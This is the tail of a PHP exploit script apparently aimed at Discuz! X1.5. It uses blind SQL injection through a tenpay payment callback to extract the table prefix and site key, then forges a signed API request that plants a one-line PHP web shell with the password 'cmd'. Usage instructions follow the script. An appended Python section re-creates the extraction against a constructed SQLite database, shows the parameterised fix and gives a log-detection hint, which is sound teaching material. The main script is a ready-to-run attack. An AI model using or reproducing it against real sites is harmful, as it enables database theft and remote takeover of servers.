        $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='";
        $res = send();
        if (strpos($res, 'SQL syntax') !== false) {
            $pre = '';
            $hash2 = array();
            $hash2 = array_merge($hash2, range(48, 57));
            $hash2 = array_merge($hash2, range(97, 122));
            $hash2[] = 95;   // underscore
            for ($j = 1; $j <= $i; $j++) {
                for ($k = 0; $k <= 255; $k++) {
                    if (in_array($k, $hash2)) {
                        $char = dechex($k);
                        $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='";
                        $res = send();
                        if (strpos($res, 'SQL syntax') !== false) {
                            echo chr($k);
                            $pre .= chr($k);
                            break;
                        }
                    }
                }
            }
            if (strlen($pre)) {
                echo "\nCracked...Table_Pre:" . $pre . "\n";
                break;
            } else {
                die('GET Table_pre Failed..');
            }
        }
    }
}

// 3. extract my_sitekey (0x6D795F736974656B6579 = 'my_sitekey') one hex digit at a time;
//    a matching character makes the UNION return a row, which the page turns into a 'SQL syntax' error
echo "Please Waiting....\n";
$sitekey = '';
for ($i = 1; $i <= 32; $i++) {
    for ($k = 0; $k <= 255; $k++) {
        if (in_array($k, $hash)) {
            $char = dechex($k);
            $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='";
            $res = send();
            if (strpos($res, 'SQL syntax') !== false) {
                echo chr($k);
                $sitekey .= chr($k);
                break;
            }
        }
    }
}

/*
By: alibaba
Modified and added some code; on success this yields a shell. The one-line shell's password is: cmd
*/
if (strlen($sitekey) != 32) {
    echo "\nmy_sitekey not found. try blank my_sitekey\n";
} else {
    echo "\nmy_sitekey:{$sitekey}\n";
}

// 4. with the sitekey, sign a forged api/manyou/my.php request that writes the one-line shell
echo "\nUploading Shell...";
$module = 'video';
$method = 'authauth';
// serialized params: base64 of <?php eval($_POST[cmd]);?> and the extension php
$params = 'a:3:{i:0;i:1;i:1;s:36:"PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=";i:2;s:3:"php";}';
$sign = md5($module . '|' . $method . '|' . $params . '|' . $sitekey);
$data = "module=$module&method=$method&params=$params&sign=$sign";
$path2 = $path . "/api/manyou/my.php";
POST($host, 80, $path2, $data, 30);

// 5. read back the shell's file name (stored in common_member_field_home.videophoto for uid 1)
echo "\nGetting Shell Location...\n";
$file = '';
for ($i = 1; $i <= 32; $i++) {
    for ($k = 0; $k <= 255; $k++) {
        if (in_array($k, $hash)) {
            $char = dechex($k);
            $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_member_field_home WHERE uid=1 AND MID(videophoto,{$i},1)=0x{$char} AND ''='";
            $res = send();
            if (strpos($res, 'SQL syntax') !== false) {
                echo chr($k);
                $file .= chr($k);
                break;
            }
        }
    }
}
echo "\nShell: $host$path/data/avatar/" . substr($file, 0, 1) . "/" . substr($file, 1, 1) . "/$file.php";
exit;

function sign($exp_str) {
    return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key=");
}

function send() {
    global $host, $path1, $tmp_expstr;
    $expdata = "attach=tenpay&retcode=0&trade_no=%2527&mch_vno=" . urlencode(urlencode($tmp_expstr)) . "&sign=" . sign($tmp_expstr);
    return POST($host, 80, $path1, $expdata, 30);
}

function POST($host, $port, $path, $data, $timeout, $cookie = '') {
    $buffer = '';
    $fp = fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$fp) {
        die($host . '/' . $path . ' : ' . $errstr . $errno);
    } else {
        fputs($fp, "POST $path HTTP/1.0\r\n");
        fputs($fp, "Host: $host\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: " . strlen($data) . "\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $data . "\r\n\r\n");
        while (!feof($fp)) {
            $buffer .= fgets($fp, 4096);
        }
        fclose($fp);
    }
    return $buffer;
}
?>
Usage: php x1.5.php http://www.**.com/
Written by toby57; the getwebshell code was added by alibaba
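The loops in the exploit ask one yes/no question per candidate character and read the answer off the page. The following added example (not toby57's or alibaba's code) reproduces that extraction against a constructed in-memory SQLite database: a stand-in for the injectable notify_credit.php parameter that reveals only whether the query matched a row, the character-by-character loop that recovers a 32-character hex sitekey from that single bit, and the parameterised version that gives the loop nothing to work with. substr() stands in for MySQL's MID(), the candidate character is a quoted literal rather than a 0x hex literal, and the table prefix pre_ and the column names are assumptions.

```python
import sqlite3

HEX_DIGITS = "0123456789abcdef"     # the exploit's candidate set: 0-9, a-f


def build_db():
    """Constructed tables: the setting that holds the sitekey and the order table the
    vulnerable statement selects from."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pre_common_setting (skey TEXT, svalue TEXT);
        INSERT INTO pre_common_setting VALUES ('my_sitekey', 'c0ffee00deadbeef0123456789abcdef');
        CREATE TABLE pre_forum_order (orderid TEXT, amount INTEGER);
        INSERT INTO pre_forum_order VALUES ('ORD-1', 100);
    """)
    return conn


def notify_credit(conn, mch_vno):
    """Stand-in for the injectable parameter: the caller only learns whether the
    statement matched a row. The real exploit read a 'SQL syntax' error string as its
    oracle; any observable true/false difference drives the same loop."""
    rows = conn.execute(
        f"SELECT amount FROM pre_forum_order WHERE orderid='{mch_vno}'").fetchall()
    return len(rows) > 0


def notify_credit_fixed(conn, mch_vno):
    """Bound parameter: the quote in the probe is data, the UNION never runs."""
    rows = conn.execute(
        "SELECT amount FROM pre_forum_order WHERE orderid=?", (mch_vno,)).fetchall()
    return len(rows) > 0


def extract_sitekey(oracle, pre="pre_", length=32):
    """Recover the sitekey one character at a time. Each probe closes the original
    quote, UNIONs a one-column SELECT that only yields a row when the character at
    position i equals the guess, and re-balances the quotes with AND ''='."""
    key = ""
    for i in range(1, length + 1):
        for c in HEX_DIGITS:
            probe = (f"' UNION ALL SELECT 1 FROM {pre}common_setting "
                     f"WHERE skey='my_sitekey' AND substr(svalue,{i},1)='{c}' AND ''='")
            if oracle(probe):
                key += c
                break
        else:
            return key      # no candidate matched at this position: stop with what we have
    return key


def demo():
    """Run the extraction against the vulnerable and the fixed handler."""
    conn = build_db()
    leaked = extract_sitekey(lambda p: notify_credit(conn, p))
    leaked_fixed = extract_sitekey(lambda p: notify_credit_fixed(conn, p))
    return leaked, leaked_fixed


if __name__ == "__main__":
    print(demo())
```

Each position costs at most 16 requests, so the whole key is a few hundred requests, which is why the original script needs no timing tricks; it is also why hundreds of near-identical requests to one callback endpoint in an access log is the thing to look for.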